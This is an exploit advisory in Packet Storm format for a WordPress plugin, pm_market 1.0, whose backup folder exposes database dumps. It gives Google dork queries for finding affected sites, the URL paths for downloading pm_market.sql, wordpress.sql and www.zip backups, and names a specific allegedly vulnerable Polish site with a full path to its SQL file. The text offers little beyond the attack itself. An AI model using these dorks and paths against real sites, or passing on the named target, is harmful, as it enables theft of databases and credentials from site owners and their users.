WordPress pm_market 1.0 Database Backup Disclosure

2018-11-29T00:00:00
ID PACKETSTORM:150537
Type packetstorm
Reporter KingSkrupellos
Modified 2018-11-29T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : WordPress pm_market Plugins 1.0 Database Backup  
Information Disclosure Vulnerability  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 30/11/2018  
# Vendor Homepage : wordpress.org ~ power.com.pl  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.0  
# Google Dorks : inurl:''/wp-content/plugins/pm_market/backup/''  
+ intext:Copyright A(c) Power Media S.A. site:pl  
# Exploit Risk : Medium  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/plugins/pm_market/backup/....  
  
/wp-content/plugins/pm_market/backup/[YEAR]-[MONTH]-[DAY]/pm_market.sql  
  
/wp-content/plugins/pm_market/backup/2012-01-05/pm_market.sql  
  
/wp-content/plugins/pm_market/backup/2012-01-05/wordpress.sql  
  
/wp-content/plugins/pm_market/backup/2012-01-05/www.zip  
  
#################################################################################################  
  
# Example Vulnerable Site =>  
  
[+]  
klaster.kalisz.pl/wp-content/plugins/pm_market/backup/2012-01-05/pm_market.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`